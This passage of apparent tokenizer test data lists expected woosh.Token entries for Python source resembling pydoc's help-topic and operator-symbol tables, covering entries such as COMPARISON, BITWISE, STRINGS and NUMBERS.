woosh.Token(woosh.OP, ',', 1858, 31, 1858, 32),
woosh.Token(woosh.STRING, "'*'", 1858, 33, 1858, 36),
woosh.Token(woosh.OP, ',', 1858, 36, 1858, 37),
woosh.Token(woosh.STRING, "'**'", 1858, 38, 1858, 42),
woosh.Token(woosh.OP, ',', 1858, 42, 1858, 43),
woosh.Token(woosh.STRING, "'/'", 1858, 44, 1858, 47),
woosh.Token(woosh.OP, ',', 1858, 47, 1858, 48),
woosh.Token(woosh.STRING, "'//'", 1858, 49, 1858, 53),
woosh.Token(woosh.OP, ',', 1858, 53, 1858, 54),
woosh.Token(woosh.STRING, "'%'", 1858, 55, 1858, 58),
woosh.Token(woosh.OP, ',', 1858, 58, 1858, 59),
woosh.Token(woosh.STRING, "'<<'", 1858, 60, 1858, 64),
woosh.Token(woosh.OP, ',', 1858, 64, 1858, 65),
woosh.Token(woosh.STRING, "'>>'", 1858, 66, 1858, 70),
woosh.Token(woosh.OP, ',', 1858, 70, 1858, 71),
woosh.Token(woosh.STRING, "'&'", 1858, 72, 1858, 75),
woosh.Token(woosh.OP, ',', 1858, 75, 1858, 76),
woosh.Token(woosh.STRING, "'|'", 1859, 23, 1859, 26),
woosh.Token(woosh.OP, ',', 1859, 26, 1859, 27),
woosh.Token(woosh.STRING, "'^'", 1859, 28, 1859, 31),
woosh.Token(woosh.OP, ',', 1859, 31, 1859, 32),
woosh.Token(woosh.STRING, "'~'", 1859, 33, 1859, 36),
woosh.Token(woosh.OP, ',', 1859, 36, 1859, 37),
woosh.Token(woosh.STRING, "'<'", 1859, 38, 1859, 41),
woosh.Token(woosh.OP, ',', 1859, 41, 1859, 42),
woosh.Token(woosh.STRING, "'>'", 1859, 43, 1859, 46),
woosh.Token(woosh.OP, ',', 1859, 46, 1859, 47),
woosh.Token(woosh.STRING, "'<='", 1859, 48, 1859, 52),
woosh.Token(woosh.OP, ',', 1859, 52, 1859, 53),
woosh.Token(woosh.STRING, "'>='", 1859, 54, 1859, 58),
woosh.Token(woosh.OP, ',', 1859, 58, 1859, 59),
woosh.Token(woosh.STRING, "'=='", 1859, 60, 1859, 64),
woosh.Token(woosh.OP, ',', 1859, 64, 1859, 65),
woosh.Token(woosh.STRING, "'!='", 1859, 66, 1859, 70),
woosh.Token(woosh.OP, ',', 1859, 70, 1859, 71),
woosh.Token(woosh.STRING, "'<>'", 1859, 72, 1859, 76),
woosh.Token(woosh.OP, ')', 1859, 76, 1859, 77),
woosh.Token(woosh.OP, ',', 1859, 77, 1859, 78),
woosh.Token(woosh.STRING, "'COMPARISON'", 1860, 8, 1860, 20),
woosh.Token(woosh.OP, ':', 1860, 21, 1860, 22),
woosh.Token(woosh.OP, '(', 1860, 23, 1860, 24),
woosh.Token(woosh.STRING, "'<'", 1860, 24, 1860, 27),
woosh.Token(woosh.OP, ',', 1860, 27, 1860, 28),
woosh.Token(woosh.STRING, "'>'", 1860, 29, 1860, 32),
woosh.Token(woosh.OP, ',', 1860, 32, 1860, 33),
woosh.Token(woosh.STRING, "'<='", 1860, 34, 1860, 38),
woosh.Token(woosh.OP, ',', 1860, 38, 1860, 39),
woosh.Token(woosh.STRING, "'>='", 1860, 40, 1860, 44),
woosh.Token(woosh.OP, ',', 1860, 44, 1860, 45),
woosh.Token(woosh.STRING, "'=='", 1860, 46, 1860, 50),
woosh.Token(woosh.OP, ',', 1860, 50, 1860, 51),
woosh.Token(woosh.STRING, "'!='", 1860, 52, 1860, 56),
woosh.Token(woosh.OP, ',', 1860, 56, 1860, 57),
woosh.Token(woosh.STRING, "'<>'", 1860, 58, 1860, 62),
woosh.Token(woosh.OP, ')', 1860, 62, 1860, 63),
woosh.Token(woosh.OP, ',', 1860, 63, 1860, 64),
woosh.Token(woosh.STRING, "'UNARY'", 1861, 8, 1861, 15),
woosh.Token(woosh.OP, ':', 1861, 16, 1861, 17),
woosh.Token(woosh.OP, '(', 1861, 18, 1861, 19),
woosh.Token(woosh.STRING, "'-'", 1861, 19, 1861, 22),
woosh.Token(woosh.OP, ',', 1861, 22, 1861, 23),
woosh.Token(woosh.STRING, "'~'", 1861, 24, 1861, 27),
woosh.Token(woosh.OP, ')', 1861, 27, 1861, 28),
woosh.Token(woosh.OP, ',', 1861, 28, 1861, 29),
woosh.Token(woosh.STRING, "'AUGMENTEDASSIGNMENT'", 1862, 8, 1862, 29),
woosh.Token(woosh.OP, ':', 1862, 30, 1862, 31),
woosh.Token(woosh.OP, '(', 1862, 32, 1862, 33),
woosh.Token(woosh.STRING, "'+='", 1862, 33, 1862, 37),
woosh.Token(woosh.OP, ',', 1862, 37, 1862, 38),
woosh.Token(woosh.STRING, "'-='", 1862, 39, 1862, 43),
woosh.Token(woosh.OP, ',', 1862, 43, 1862, 44),
woosh.Token(woosh.STRING, "'*='", 1862, 45, 1862, 49),
woosh.Token(woosh.OP, ',', 1862, 49, 1862, 50),
woosh.Token(woosh.STRING, "'/='", 1862, 51, 1862, 55),
woosh.Token(woosh.OP, ',', 1862, 55, 1862, 56),
woosh.Token(woosh.STRING, "'%='", 1862, 57, 1862, 61),
woosh.Token(woosh.OP, ',', 1862, 61, 1862, 62),
woosh.Token(woosh.STRING, "'&='", 1862, 63, 1862, 67),
woosh.Token(woosh.OP, ',', 1862, 67, 1862, 68),
woosh.Token(woosh.STRING, "'|='", 1862, 69, 1862, 73),
woosh.Token(woosh.OP, ',', 1862, 73, 1862, 74),
woosh.Token(woosh.STRING, "'^='", 1863, 32, 1863, 36),
woosh.Token(woosh.OP, ',', 1863, 36, 1863, 37),
woosh.Token(woosh.STRING, "'<<='", 1863, 38, 1863, 43),
woosh.Token(woosh.OP, ',', 1863, 43, 1863, 44),
woosh.Token(woosh.STRING, "'>>='", 1863, 45, 1863, 50),
woosh.Token(woosh.OP, ',', 1863, 50, 1863, 51),
woosh.Token(woosh.STRING, "'**='", 1863, 52, 1863, 57),
woosh.Token(woosh.OP, ',', 1863, 57, 1863, 58),
woosh.Token(woosh.STRING, "'//='", 1863, 59, 1863, 64),
woosh.Token(woosh.OP, ')', 1863, 64, 1863, 65),
woosh.Token(woosh.OP, ',', 1863, 65, 1863, 66),
woosh.Token(woosh.STRING, "'BITWISE'", 1864, 8, 1864, 17),
woosh.Token(woosh.OP, ':', 1864, 18, 1864, 19),
woosh.Token(woosh.OP, '(', 1864, 20, 1864, 21),
woosh.Token(woosh.STRING, "'<<'", 1864, 21, 1864, 25),
woosh.Token(woosh.OP, ',', 1864, 25, 1864, 26),
woosh.Token(woosh.STRING, "'>>'", 1864, 27, 1864, 31),
woosh.Token(woosh.OP, ',', 1864, 31, 1864, 32),
woosh.Token(woosh.STRING, "'&'", 1864, 33, 1864, 36),
woosh.Token(woosh.OP, ',', 1864, 36, 1864, 37),
woosh.Token(woosh.STRING, "'|'", 1864, 38, 1864, 41),
woosh.Token(woosh.OP, ',', 1864, 41, 1864, 42),
woosh.Token(woosh.STRING, "'^'", 1864, 43, 1864, 46),
woosh.Token(woosh.OP, ',', 1864, 46, 1864, 47),
woosh.Token(woosh.STRING, "'~'", 1864, 48, 1864, 51),
woosh.Token(woosh.OP, ')', 1864, 51, 1864, 52),
woosh.Token(woosh.OP, ',', 1864, 52, 1864, 53),
woosh.Token(woosh.STRING, "'COMPLEX'", 1865, 8, 1865, 17),
woosh.Token(woosh.OP, ':', 1865, 18, 1865, 19),
woosh.Token(woosh.OP, '(', 1865, 20, 1865, 21),
woosh.Token(woosh.STRING, "'j'", 1865, 21, 1865, 24),
woosh.Token(woosh.OP, ',', 1865, 24, 1865, 25),
woosh.Token(woosh.STRING, "'J'", 1865, 26, 1865, 29),
woosh.Token(woosh.OP, ')', 1865, 29, 1865, 30),
woosh.Token(woosh.OP, '}', 1866, 4, 1866, 5),
woosh.Token(woosh.NEWLINE, '\r\n', 1866, 5, 1867, 0),
woosh.Token(woosh.NAME, 'symbols', 1867, 4, 1867, 11),
woosh.Token(woosh.OP, '=', 1867, 12, 1867, 13),
woosh.Token(woosh.OP, '{', 1867, 14, 1867, 15),
woosh.Token(woosh.STRING, "'%'", 1868, 8, 1868, 11),
woosh.Token(woosh.OP, ':', 1868, 11, 1868, 12),
woosh.Token(woosh.STRING, "'OPERATORS FORMATTING'", 1868, 13, 1868, 35),
woosh.Token(woosh.OP, ',', 1868, 35, 1868, 36),
woosh.Token(woosh.STRING, "'**'", 1869, 8, 1869, 12),
woosh.Token(woosh.OP, ':', 1869, 12, 1869, 13),
woosh.Token(woosh.STRING, "'POWER'", 1869, 14, 1869, 21),
woosh.Token(woosh.OP, ',', 1869, 21, 1869, 22),
woosh.Token(woosh.STRING, "','", 1870, 8, 1870, 11),
woosh.Token(woosh.OP, ':', 1870, 11, 1870, 12),
woosh.Token(woosh.STRING, "'TUPLES LISTS FUNCTIONS'", 1870, 13, 1870, 37),
woosh.Token(woosh.OP, ',', 1870, 37, 1870, 38),
woosh.Token(woosh.STRING, "'.'", 1871, 8, 1871, 11),
woosh.Token(woosh.OP, ':', 1871, 11, 1871, 12),
woosh.Token(woosh.STRING, "'ATTRIBUTES FLOAT MODULES OBJECTS'", 1871, 13, 1871, 47),
woosh.Token(woosh.OP, ',', 1871, 47, 1871, 48),
woosh.Token(woosh.STRING, "'...'", 1872, 8, 1872, 13),
woosh.Token(woosh.OP, ':', 1872, 13, 1872, 14),
woosh.Token(woosh.STRING, "'ELLIPSIS'", 1872, 15, 1872, 25),
woosh.Token(woosh.OP, ',', 1872, 25, 1872, 26),
woosh.Token(woosh.STRING, "':'", 1873, 8, 1873, 11),
woosh.Token(woosh.OP, ':', 1873, 11, 1873, 12),
woosh.Token(woosh.STRING, "'SLICINGS DICTIONARYLITERALS'", 1873, 13, 1873, 42),
woosh.Token(woosh.OP, ',', 1873, 42, 1873, 43),
woosh.Token(woosh.STRING, "'@'", 1874, 8, 1874, 11),
woosh.Token(woosh.OP, ':', 1874, 11, 1874, 12),
woosh.Token(woosh.STRING, "'def class'", 1874, 13, 1874, 24),
woosh.Token(woosh.OP, ',', 1874, 24, 1874, 25),
woosh.Token(woosh.STRING, "'\\\\'", 1875, 8, 1875, 12),
woosh.Token(woosh.OP, ':', 1875, 12, 1875, 13),
woosh.Token(woosh.STRING, "'STRINGS'", 1875, 14, 1875, 23),
woosh.Token(woosh.OP, ',', 1875, 23, 1875, 24),
woosh.Token(woosh.STRING, "'_'", 1876, 8, 1876, 11),
woosh.Token(woosh.OP, ':', 1876, 11, 1876, 12),
woosh.Token(woosh.STRING, "'PRIVATENAMES'", 1876, 13, 1876, 27),
woosh.Token(woosh.OP, ',', 1876, 27, 1876, 28),
woosh.Token(woosh.STRING, "'__'", 1877, 8, 1877, 12),
woosh.Token(woosh.OP, ':', 1877, 12, 1877, 13),
woosh.Token(woosh.STRING, "'PRIVATENAMES SPECIALMETHODS'", 1877, 14, 1877, 43),
woosh.Token(woosh.OP, ',', 1877, 43, 1877, 44),
woosh.Token(woosh.STRING, "'`'", 1878, 8, 1878, 11),
woosh.Token(woosh.OP, ':', 1878, 11, 1878, 12),
woosh.Token(woosh.STRING, "'BACKQUOTES'", 1878, 13, 1878, 25),
woosh.Token(woosh.OP, ',', 1878, 25, 1878, 26),
woosh.Token(woosh.STRING, "'('", 1879, 8, 1879, 11),
woosh.Token(woosh.OP, ':', 1879, 11, 1879, 12),
woosh.Token(woosh.STRING, "'TUPLES FUNCTIONS CALLS'", 1879, 13, 1879, 37),
woosh.Token(woosh.OP, ',', 1879, 37, 1879, 38),
woosh.Token(woosh.STRING, "')'", 1880, 8, 1880, 11),
woosh.Token(woosh.OP, ':', 1880, 11, 1880, 12),
woosh.Token(woosh.STRING, "'TUPLES FUNCTIONS CALLS'", 1880, 13, 1880, 37),
woosh.Token(woosh.OP, ',', 1880, 37, 1880, 38),
woosh.Token(woosh.STRING, "'['", 1881, 8, 1881, 11),
woosh.Token(woosh.OP, ':', 1881, 11, 1881, 12),
woosh.Token(woosh.STRING, "'LISTS SUBSCRIPTS SLICINGS'", 1881, 13, 1881, 40),
woosh.Token(woosh.OP, ',', 1881, 40, 1881, 41),
woosh.Token(woosh.STRING, "']'", 1882, 8, 1882, 11),
woosh.Token(woosh.OP, ':', 1882, 11, 1882, 12),
woosh.Token(woosh.STRING, "'LISTS SUBSCRIPTS SLICINGS'", 1882, 13, 1882, 40),
woosh.Token(woosh.OP, '}', 1883, 4, 1883, 5),
woosh.Token(woosh.NEWLINE, '\r\n', 1883, 5, 1884, 0),
woosh.Token(woosh.NAME, 'for', 1884, 4, 1884, 7),
woosh.Token(woosh.NAME, 'topic', 1884, 8, 1884, 13),
woosh.Token(woosh.OP, ',', 1884, 13, 1884, 14),
woosh.Token(woosh.NAME, 'symbols_', 1884, 15, 1884, 23),
woosh.Token(woosh.NAME, 'in', 1884, 24, 1884, 26),
woosh.Token(woosh.NAME, '_symbols_inverse', 1884, 27, 1884, 43),
woosh.Token(woosh.OP, '.', 1884, 43, 1884, 44),
woosh.Token(woosh.NAME, 'items', 1884, 44, 1884, 49),
woosh.Token(woosh.OP, '(', 1884, 49, 1884, 50),
woosh.Token(woosh.OP, ')', 1884, 50, 1884, 51),
woosh.Token(woosh.OP, ':', 1884, 51, 1884, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1884, 52, 1885, 0),
woosh.Token(woosh.INDENT, ' ', 1885, 0, 1885, 8),
woosh.Token(woosh.NAME, 'for', 1885, 8, 1885, 11),
woosh.Token(woosh.NAME, 'symbol', 1885, 12, 1885, 18),
woosh.Token(woosh.NAME, 'in', 1885, 19, 1885, 21),
woosh.Token(woosh.NAME, 'symbols_', 1885, 22, 1885, 30),
woosh.Token(woosh.OP, ':', 1885, 30, 1885, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1885, 31, 1886, 0),
woosh.Token(woosh.INDENT, ' ', 1886, 0, 1886, 12),
woosh.Token(woosh.NAME, 'topics', 1886, 12, 1886, 18),
woosh.Token(woosh.OP, '=', 1886, 19, 1886, 20),
woosh.Token(woosh.NAME, 'symbols', 1886, 21, 1886, 28),
woosh.Token(woosh.OP, '.', 1886, 28, 1886, 29),
woosh.Token(woosh.NAME, 'get', 1886, 29, 1886, 32),
woosh.Token(woosh.OP, '(', 1886, 32, 1886, 33),
woosh.Token(woosh.NAME, 'symbol', 1886, 33, 1886, 39),
woosh.Token(woosh.OP, ',', 1886, 39, 1886, 40),
woosh.Token(woosh.NAME, 'topic', 1886, 41, 1886, 46),
woosh.Token(woosh.OP, ')', 1886, 46, 1886, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1886, 47, 1887, 0),
woosh.Token(woosh.NAME, 'if', 1887, 12, 1887, 14),
woosh.Token(woosh.NAME, 'topic', 1887, 15, 1887, 20),
woosh.Token(woosh.NAME, 'not', 1887, 21, 1887, 24),
woosh.Token(woosh.NAME, 'in', 1887, 25, 1887, 27),
woosh.Token(woosh.NAME, 'topics', 1887, 28, 1887, 34),
woosh.Token(woosh.OP, ':', 1887, 34, 1887, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 1887, 35, 1888, 0),
woosh.Token(woosh.INDENT, ' ', 1888, 0, 1888, 16),
woosh.Token(woosh.NAME, 'topics', 1888, 16, 1888, 22),
woosh.Token(woosh.OP, '=', 1888, 23, 1888, 24),
woosh.Token(woosh.NAME, 'topics', 1888, 25, 1888, 31),
woosh.Token(woosh.OP, '+', 1888, 32, 1888, 33),
woosh.Token(woosh.STRING, "' '", 1888, 34, 1888, 37),
woosh.Token(woosh.OP, '+', 1888, 38, 1888, 39),
woosh.Token(woosh.NAME, 'topic', 1888, 40, 1888, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1888, 45, 1889, 0),
woosh.Token(woosh.DEDENT, ' ', 1889, 0, 1889, 12),
woosh.Token(woosh.NAME, 'symbols', 1889, 12, 1889, 19),
woosh.Token(woosh.OP, '[', 1889, 19, 1889, 20),
woosh.Token(woosh.NAME, 'symbol', 1889, 20, 1889, 26),
woosh.Token(woosh.OP, ']', 1889, 26, 1889, 27),
woosh.Token(woosh.OP, '=', 1889, 28, 1889, 29),
woosh.Token(woosh.NAME, 'topics', 1889, 30, 1889, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1889, 36, 1890, 0),
woosh.Token(woosh.DEDENT, ' ', 1891, 0, 1891, 4),
woosh.Token(woosh.DEDENT, '', 1891, 4, 1891, 4),
woosh.Token(woosh.NAME, 'topics', 1891, 4, 1891, 10),
woosh.Token(woosh.OP, '=', 1891, 11, 1891, 12),
woosh.Token(woosh.OP, '{', 1891, 13, 1891, 14),
woosh.Token(woosh.STRING, "'TYPES'", 1892, 8, 1892, 15),
woosh.Token(woosh.OP, ':', 1892, 15, 1892, 16),
woosh.Token(woosh.OP, '(', 1892, 17, 1892, 18),
woosh.Token(woosh.STRING, "'types'", 1892, 18, 1892, 25),
woosh.Token(woosh.OP, ',', 1892, 25, 1892, 26),
woosh.Token(woosh.STRING, "'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '", 1892, 27, 1892, 72),
woosh.Token(woosh.STRING, "'FUNCTIONS CLASSES MODULES FILES inspect'", 1893, 18, 1893, 59),
woosh.Token(woosh.OP, ')', 1893, 59, 1893, 60),
woosh.Token(woosh.OP, ',', 1893, 60, 1893, 61),
woosh.Token(woosh.STRING, "'STRINGS'", 1894, 8, 1894, 17),
woosh.Token(woosh.OP, ':', 1894, 17, 1894, 18),
woosh.Token(woosh.OP, '(', 1894, 19, 1894, 20),
woosh.Token(woosh.STRING, "'strings'", 1894, 20, 1894, 29),
woosh.Token(woosh.OP, ',', 1894, 29, 1894, 30),
woosh.Token(woosh.STRING, "'str UNICODE SEQUENCES STRINGMETHODS '", 1894, 31, 1894, 69),
woosh.Token(woosh.STRING, "'FORMATTING TYPES'", 1895, 20, 1895, 38),
woosh.Token(woosh.OP, ')', 1895, 38, 1895, 39),
woosh.Token(woosh.OP, ',', 1895, 39, 1895, 40),
woosh.Token(woosh.STRING, "'STRINGMETHODS'", 1896, 8, 1896, 23),
woosh.Token(woosh.OP, ':', 1896, 23, 1896, 24),
woosh.Token(woosh.OP, '(', 1896, 25, 1896, 26),
woosh.Token(woosh.STRING, "'string-methods'", 1896, 26, 1896, 42),
woosh.Token(woosh.OP, ',', 1896, 42, 1896, 43),
woosh.Token(woosh.STRING, "'STRINGS FORMATTING'", 1896, 44, 1896, 64),
woosh.Token(woosh.OP, ')', 1896, 64, 1896, 65),
woosh.Token(woosh.OP, ',', 1896, 65, 1896, 66),
woosh.Token(woosh.STRING, "'FORMATTING'", 1897, 8, 1897, 20),
woosh.Token(woosh.OP, ':', 1897, 20, 1897, 21),
woosh.Token(woosh.OP, '(', 1897, 22, 1897, 23),
woosh.Token(woosh.STRING, "'formatstrings'", 1897, 23, 1897, 38),
woosh.Token(woosh.OP, ',', 1897, 38, 1897, 39),
woosh.Token(woosh.STRING, "'OPERATORS'", 1897, 40, 1897, 51),
woosh.Token(woosh.OP, ')', 1897, 51, 1897, 52),
woosh.Token(woosh.OP, ',', 1897, 52, 1897, 53),
woosh.Token(woosh.STRING, "'UNICODE'", 1898, 8, 1898, 17),
woosh.Token(woosh.OP, ':', 1898, 17, 1898, 18),
woosh.Token(woosh.OP, '(', 1898, 19, 1898, 20),
woosh.Token(woosh.STRING, "'strings'", 1898, 20, 1898, 29),
woosh.Token(woosh.OP, ',', 1898, 29, 1898, 30),
woosh.Token(woosh.STRING, "'encodings unicode SEQUENCES STRINGMETHODS '", 1898, 31, 1898, 75),
woosh.Token(woosh.STRING, "'FORMATTING TYPES'", 1899, 20, 1899, 38),
woosh.Token(woosh.OP, ')', 1899, 38, 1899, 39),
woosh.Token(woosh.OP, ',', 1899, 39, 1899, 40),
woosh.Token(woosh.STRING, "'NUMBERS'", 1900, 8, 1900, 17),
woosh.Token(woosh.OP, ':', 1900, 17, 1900, 18),
woosh.Token(woosh.OP, '(', 1900, 19, 1900, 20),
woosh.Token(woosh.STRING, "'numbers'", 1900, 20, 1900, 29),
woosh.Token(woosh.OP, ',', 1900, 29, 1900, 30),
woosh.Token(woosh.STRING, "'INTEGER FLOAT COMPLEX TYPES'", 1900, 31, 1900, 60),
woosh.Token(woosh.OP, ')', 1900, 60, 1900, 61),
woosh.Token(woosh.OP, ',', 1900, 61, 1900, 62),
woosh.Token(woosh.STRING, "'INTEGER'", 1901, 8, 1901, 17),
woosh.Token(woosh.OP, ':', 1901, 17, 1901, 18),
woosh.Token(woosh.OP, '(', 1901, 19, 1901, 20),
woosh.Token(woosh.STRING, "'integers'", 1901, 20, 1901, 30),
woosh.Token(woosh.OP, ',', 1901, 30, 1901, 31),
woosh.Token(woosh.STRING, "'int range'", 1901, 32, 1901, 43),
woosh.Token(woosh.OP, ')', 1901, 43, 1901, 44),
woosh.Token(woosh.OP, ',', 1901, 44, 1901, 45),
woosh.Token(woosh.STRING, "'FLOAT'", 1902, 8, 1902, 15),
woosh.Token(woosh.OP, ':', 1902, 15, 1902, 16),
woosh.Token(woosh.OP, '(', 1902, 17, 1902, 18),
woosh.Token(woosh.STRING, "'floating'", 1902, 18, 1902, 28),
woosh.Token(woosh.OP, ',', 1902, 28, 1902, 29),
woosh.Token(woosh.STRING, "'float math'", 1902, 30, 1902, 42),
woosh.Token(woosh.OP, ')', 1902, 42, 1902, 43),
woosh.Token(woosh.OP, ',', 1902, 43, 1902, 44),
woosh.Token(woosh.STRING, "'COMPLEX'", 1903, 8, 1903, 17),
woosh.Token(woosh.OP, ':', 1903, 17, 1903, 18),
woosh.Token(woosh.OP, '(', 1903, 19, 1903, 20),
woosh.Token(woosh.STRING, "'imaginary'", 1903, 20, 1903, 31),
woosh.Token(woosh.OP, ',', 1903, 31, 1903, 32),
woosh.Token(woosh.STRING, "'complex cmath'", 1903, 33, 1903, 48),
woosh.Token(woosh.OP, ')', 1903, 48, 1903, 49),
woosh.Token(woosh.OP, ',', 1903, 49, 1903, 50),
woosh.Token(woosh.STRING, "'SEQUENCES'", 1904, 8, 1904, 19),
woosh.Token(woosh.OP, ':', 1904, 19, 1904, 20),
woosh.Token(woosh.OP, '(', 1904, 21, 1904, 22),
woosh.Token(woosh.STRING, "'typesseq'", 1904, 22, 1904, 32),
woosh.Token(woosh.OP, ',', 1904, 32, 1904, 33),
woosh.Token(woosh.STRING, "'STRINGMETHODS FORMATTING range LISTS'", 1904, 34, 1904, 72),
woosh.Token(woosh.OP, ')', 1904, 72, 1904, 73),
woosh.Token(woosh.OP, ',', 1904, 73, 1904, 74),
woosh.Token(woosh.STRING, "'MAPPINGS'", 1905, 8, 1905, 18),
woosh.Token(woosh.OP, ':', 1905, 18, 1905, 19),
woosh.Token(woosh.STRING, "'DICTIONARIES'", 1905, 20, 1905, 34),
woosh.Token(woosh.OP, ',', 1905, 34, 1905, 35),
woosh.Token(woosh.STRING, "'FUNCTIONS'", 1906, 8, 1906, 19),
woosh.Token(woosh.OP, ':', 1906, 19, 1906, 20),
woosh.Token(woosh.OP, '(', 1906, 21, 1906, 22),
woosh.Token(woosh.STRING, "'typesfunctions'", 1906, 22, 1906, 38),
woosh.Token(woosh.OP, ',', 1906, 38, 1906, 39),
woosh.Token(woosh.STRING, "'def TYPES'", 1906, 40, 1906, 51),
woosh.Token(woosh.OP, ')', 1906, 51, 1906, 52),
woosh.Token(woosh.OP, ',', 1906, 52, 1906, 53),
woosh.Token(woosh.STRING, "'METHODS'", 1907, 8, 1907, 17),
woosh.Token(woosh.OP, ':', 1907, 17, 1907, 18),
woosh.Token(woosh.OP, '(', 1907, 19, 1907, 20),
woosh.Token(woosh.STRING, "'typesmethods'", 1907, 20, 1907, 34),
woosh.Token(woosh.OP, ',', 1907, 34, 1907, 35),
woosh.Token(woosh.STRING, "'class def CLASSES TYPES'", 1907, 36, 1907, 61),
woosh.Token(woosh.OP, ')', 1907, 61, 1907, 62),
woosh.Token(woosh.OP, ',', 1907, 62, 1907, 63),
woosh.Token(woosh.STRING, "'CODEOBJECTS'", 1908, 8, 1908, 21),
woosh.Token(woosh.OP, ':', 1908, 21, 1908, 22),
woosh.Token(woosh.OP, '(', 1908, 23, 1908, 24),
woosh.Token(woosh.STRING, "'bltin-code-objects'", 1908, 24, 1908, 44),
woosh.Token(woosh.OP, ',', 1908, 44, 1908, 45),
woosh.Token(woosh.STRING, "'compile FUNCTIONS TYPES'", 1908, 46, 1908, 71),
woosh.Token(woosh.OP, ')', 1908, 71, 1908, 72),
woosh.Token(woosh.OP, ',', 1908, 72, 1908, 73),
woosh.Token(woosh.STRING, "'TYPEOBJECTS'", 1909, 8, 1909, 21),
woosh.Token(woosh.OP, ':', 1909, 21, 1909, 22),
woosh.Token(woosh.OP, '(', 1909, 23, 1909, 24),
woosh.Token(woosh.STRING, "'bltin-type-objects'", 1909, 24, 1909, 44),
woosh.Token(woosh.OP, ',', 1909, 44, 1909, 45),
woosh.Token(woosh.STRING, "'types TYPES'", 1909, 46, 1909, 59),
woosh.Token(woosh.OP, ')', 1909, 59, 1909, 60),
woosh.Token(woosh.OP, ',', 1909, 60, 1909, 61),
woosh.Token(woosh.STRING, "'FRAMEOBJECTS'", 1910, 8, 1910, 22),
woosh.Token(woosh.OP, ':', 1910, 22, 1910, 23),
woosh.Token(woosh.STRING, "'TYPES'", 1910, 24, 1910, 31),
woosh.Token(woosh.OP, ',', 1910, 31, 1910, 32),
woosh.Token(woosh.STRING, "'TRACEBACKS'", 1911, 8, 1911, 20),
woosh.Token(woosh.OP, ':', 1911, 20, 1911, 21),
woosh.Token(woosh.STRING, "'TYPES'", 1911, 22, 1911, 29),
woosh.Token(woosh.OP, ',', 1911, 29, 1911, 30),
woosh.Token(woosh.STRING, "'NONE'", 1912, 8, 1912, 14),
woosh.Token(woosh.OP, ':', 1912, 14, 1912, 15),
woosh.Token(woosh.OP, '(', 1912, 16, 1912, 17),
woosh.Token(woosh.STRING, "'bltin-null-object'", 1912, 17, 1912, 36),
woosh.Token(woosh.OP, ',', 1912, 36, 1912, 37),
woosh.Token(woosh.STRING, "''", 1912, 38, 1912, 40),
woosh.Token(woosh.OP, ')', 1912, 40, 1912, 41),
woosh.Token(woosh.OP, ',', 1912, 41, 1912, 42),
woosh.Token(woosh.STRING, "'ELLIPSIS'", 1913, 8, 1913, 18),
woosh.Token(woosh.OP, ':', 1913, 18, 1913, 19),
woosh.Token(woosh.OP, '(', 1913, 20, 1913, 21),
woosh.Token(woosh.STRING, "'bltin-ellipsis-object'", 1913, 21, 1913, 44),
woosh.Token(woosh.OP, ',', 1913, 44, 1913, 45),
woosh.Token(woosh.STRING, "'SLICINGS'", 1913, 46, 1913, 56),
woosh.Token(woosh.OP, ')', 1913, 56, 1913, 57),
woosh.Token(woosh.OP, ',', 1913, 57, 1913, 58),
woosh.Token(woosh.STRING, "'SPECIALATTRIBUTES'", 1914, 8, 1914, 27),
woosh.Token(woosh.OP, ':', 1914, 27, 1914, 28),
woosh.Token(woosh.OP, '(', 1914, 29, 1914, 30),
woosh.Token(woosh.STRING, "'specialattrs'", 1914, 30, 1914, 44),
woosh.Token(woosh.OP, ',', 1914, 44, 1914, 45),
woosh.Token(woosh.STRING, "''", 1914, 46, 1914, 48),
woosh.Token(woosh.OP, ')', 1914, 48, 1914, 49),
woosh.Token(woosh.OP, ',', 1914, 49, 1914, 50),
woosh.Token(woosh.STRING, "'CLASSES'", 1915, 8, 1915, 17),
woosh.Token(woosh.OP, ':', 1915, 17, 1915, 18),
woosh.Token(woosh.OP, '(', 1915, 19, 1915, 20),
woosh.Token(woosh.STRING, "'types'", 1915, 20, 1915, 27),
woosh.Token(woosh.OP, ',', 1915, 27, 1915, 28),
woosh.Token(woosh.STRING, "'class SPECIALMETHODS PRIVATENAMES'", 1915, 29, 1915, 64),
woosh.Token(woosh.OP, ')', 1915, 64, 1915, 65),
woosh.Token(woosh.OP, ',', 1915, 65, 1915, 66),
woosh.Token(woosh.STRING, "'MODULES'", 1916, 8, 1916, 17),
woosh.Token(woosh.OP, ':', 1916, 17, 1916, 18),
woosh.Token(woosh.OP, '(', 1916, 19, 1916, 20),
woosh.Token(woosh.STRING, "'typesmodules'", 1916, 20, 1916, 34),
woosh.Token(woosh.OP, ',', 1916, 34, 1916, 35),
woosh.Token(woosh.STRING, "'import'", 1916, 36, 1916, 44),
woosh.Token(woosh.OP, ')', 1916, 44, 1916, 45),
woosh.Token(woosh.OP, ',', 1916, 45, 1916, 46),
woosh.Token(woosh.STRING, "'PACKAGES'", 1917, 8, 1917, 18),
woosh.Token(woosh.OP, ':', 1917, 18, 1917, 19),
woosh.Token(woosh.STRING, "'import'", 1917, 20, 1917, 28),
woosh.Token(woosh.OP, ',', 1917, 28, 1917, 29),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1918, 8, 1918, 21),
woosh.Token(woosh.OP, ':', 1918, 21, 1918, 22),
woosh.Token(woosh.OP, '(', 1918, 23, 1918, 24),
woosh.Token(woosh.STRING, "'operator-summary'", 1918, 24, 1918, 42),
woosh.Token(woosh.OP, ',', 1918, 42, 1918, 43),
woosh.Token(woosh.STRING, "'lambda or and not in is BOOLEAN '", 1918, 44, 1918, 78),
woosh.Token(woosh.STRING, "'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '", 1919, 24, 1919, 78),
woosh.Token(woosh.STRING, "'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '", 1920, 24, 1920, 76),
woosh.Token(woosh.STRING, "'LISTS DICTIONARIES'", 1921, 24, 1921, 44),
woosh.Token(woosh.OP, ')', 1921, 44, 1921, 45),
woosh.Token(woosh.OP, ',', 1921, 45, 1921, 46),
woosh.Token(woosh.STRING, "'OPERATORS'", 1922, 8, 1922, 19),
woosh.Token(woosh.OP, ':', 1922, 19, 1922, 20),
